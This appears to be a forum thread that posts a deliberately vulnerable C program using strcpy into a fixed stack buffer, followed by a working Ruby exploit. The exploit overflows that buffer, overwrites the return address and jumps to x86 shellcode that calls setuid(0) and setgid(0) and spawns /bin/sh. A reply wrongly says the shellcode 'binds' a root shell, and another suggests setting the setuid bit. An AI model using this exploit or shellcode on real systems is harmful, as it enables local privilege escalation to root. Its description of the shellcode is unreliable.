Buffer overflow flaw (written in C):
#include <string.h>
int main(int argc, char **argv) {
    char buf[256];
    /* no length check: an argv[1] longer than 255 bytes overflows buf */
    strcpy(buf, argv[1]);
}
Ruby exploit:
#!/usr/local/bin/ruby
shellcode =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"+
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"+
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"+
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
path = "./falha"
buffer = ("A" * 268)
ret = (0xbffffffa - shellcode.length - path.length)
print "Shellcode : " , shellcode.length , "\n"
print "Path : ", path.length, "\n"
print "New ret : " , ret , "\n"
new_ret = [ret].pack('L')
buffer += new_ret
ENV['BadShell'] = "#{ENV['BadShell']}#{shellcode}"
system(path,buffer)
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"+
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"+
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"+
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
What does this shellcode do?
Quote from: Wuefez on 03 June 2009, 03:36:12 AM
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"+
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"+
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"+
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
What does this shellcode do?
It binds a root shell!
EDIT: give it permissions
chmod u+s exploit
u = Gives the permissions that the file's owning user has....
s = sets the user or group ID during execution ...
Note: Any and all exploits (even your own) should be tested in virtual machines...